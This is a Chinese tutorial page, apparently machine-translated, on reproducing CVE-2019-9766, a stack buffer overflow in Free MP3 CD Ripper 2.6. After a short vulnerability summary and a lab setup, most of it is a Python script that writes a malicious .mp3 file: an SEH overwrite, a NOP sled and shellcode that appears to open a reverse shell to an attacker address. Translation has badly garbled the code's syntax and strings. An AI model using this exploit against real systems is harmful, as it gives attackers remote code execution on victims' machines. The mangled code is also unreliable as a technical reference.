介绍
如何实现免费MP3光盘开膛手缓冲区溢出远程代码执行漏洞cve - 2019 - 9766复现,很多新手对此不是很清楚,为了帮助大家解决这个难题,下面小编将为大家详细讲解,有这方面需求的人可以来学习下,希望你能有所收获。
<强>漏洞简介:
免费MP3光盘开膛手是一款音频格式转换器。
免费MP3光盘开膛手2.6版本中存在栈缓冲区溢出漏洞。远程攻击者可借助特制的。mp3文件利用该漏洞执行任意代码。
<强>威胁类型
远程代码执行
<强>威胁等级
高
<强>漏洞编号
cve - 2019 - 9766
<>强受影响系统及应用版本
免费mp3光盘开膛手2.6
<强>漏洞复现:
<强>攻击机:kali2020, kali2019,
<强> ip <强>:192.168.6.146 ,
<强>受害机:win10 ,,,,
<强> ip <强>:192.168.6.142
<强>安装免费MP3光盘开膛手2.6版本
<强> 1,搭建环境
<强> Win10 <强>下载安装免费MP3光盘开膛手2.6版本
, 
<强>替换脚本中的shellcode。
<强>编写生成MP3文件的脚本
# Stack-based buffer overflow 拷贝Free MP3 CD Ripper 2.6 缓冲=癆" * 4116 NSEH=癨 xeb \ x06 \ x90 \ x90" 医师=癨 x84 \ x20的\ xe4 \ x66" 空操作=癨 x90" * 5 buf=?“ buf=癨 xfc \ xe8 \ x82 \ x00 \ x00 \ x00 \ x60 \ x89 \ xe5 \ x31 \ xc0 \ x64 \ x8b \×50 \ x30" buf=癨 x8b \ x52 \ x0c \ x8b \ x52 \ x14 \ x8b \ x72 \ x28 \ x0f \ xb7 \ x4a \ x26 \ x31 \ xff" buf=癨 xac \ x3c \ x61 \ x7c \ x02 \ x2c \ x20 \ xc1之前\ xcf \ x0d \ x01 \ xc7 \ xe2 \ xf2 \ x52" buf=癨 x57 \ x8b \ x52 \ x10 \ x8b \ x4a \ x3c \ x8b \ x4c \ x11 \ x78 \ xe3 \ x48 \ x01 \ xd1" buf=癨 x51 \ x8b \ x59 \ x20 \ x01 \ xd3 \ x8b \ x49 \ x18 \ xe3 \ x3a \ x49 \ x8b \ x34 \ x8b" buf=癨 x01 \ xd6 \ x31 \ xff \ xac \ xc1之前\ xcf \ x0d \ x01 \ xc7 \ x38 \ xe0 \ x75 \ xf6 \ x03" buf=癨 x7d \ xf8 \ x3b \ x7d \ x24 \ x75 \ xe4 \ x58 \ x8b \ x58 \ x24 \ x01 \ xd3 \ x66 \ x8b" buf=癨 x0c \ x4b \ x8b \ x58 \ x1c \ x01 \ xd3 \ x8b \ x04 \ x8b \ x01 \ xd0 \ x89 \ x44 \ x24" buf=癨 x24 \ x5b \ x5b \ x61 \ x59 \ x5a \ x51 \ xff \ xe0 \ x5f \ x5f \ x5a \ x8b \ x12 \ xeb" buf=癨 x8d \ x5d \ x68 \ x33 \ x32 \ x00 \ x00 \ x68 \ x77 \ x73 \ x32 \ x5f \ x54 \ x68 \ x4c" buf=癨 x77 \ x26 \ x07 \ x89 \ xe8 \ xff \ xd0 \ xb8 \ x90 \ x01 \ x00 \ x00 \ x29 \ xc4 \ x54" buf=癨×50 \ x68 \ x29 \ x80 \ x6b \ x00 \ xff \ xd5 \ x6a \ x0a \ x68 \ xc0 \ xa8 \ x6e \ x84" buf=癨 x68 \ x02 \ x00 \ x03 \ x78 \ x89 \ xe6 \×50 \×50 \×50 \ \×50 \ \×50 \ x40 x40 x50" buf=癨 x68 \ xea \ x0f \ xdf \ xe0 \ xff \ xd5 \ x97 \ x6a \ x10 \ x56 \ x57 \ x68 \ x99 \ xa5" buf=癨 x74 \ x61 \ xff \ xd5 \ x85 \ xc0 \ x74 \ x0c \ xff \ x4e \ (\ x75 \ xec \ x68 \ xf0" buf=癨 xb5 \ xa2 \ x56 \ xff \ xd5 \ x6a \ x00 \ x6a \ x04 \ x56 \ x57 \ x68 \ x02 \ xd9 \ xc8" buf=癨 x5f \ xff \ xd5 \ x8b \ x36 \ x68 \ x00 \ \ x6a \ x40 x10 \ x00 \ x00 \ x56 \ x6a \ x00" buf=癨 x68 \ x58 \ xa4 \ x53 \ xe5 \ xff \ xd5 \ x93 \ x53 \ x6a \ x00 \ x56 \ x53 \ x57 \ x68" buf=癨 x02 \ xd9 \ xc8 \ x5f \ xff \ xd5 \ x01 \ xc3 \ x29 \ . xc6 \ x75 \ xee \ xc3"; 垫=癇" * (316 - len (nop) len (buf)) 有效载荷=缓冲+ NSEH +医师+空操作+ buf +垫 试一试: ,,,f=开放(“Test_Free_MP3.mp3",“w") ,,,print (“[+] Creating % s bytes mp3 文件…“% len(载荷)) ,,,f.write(载荷) ,,,f.close (), ,,,print (“[+] mp3 File created 成功!“) 除了: ,,,print (“File cannot be 创建!“)如何实现免费MP3光盘开膛手缓冲区溢出远程代码执行漏洞cve - 2019 - 9766复现
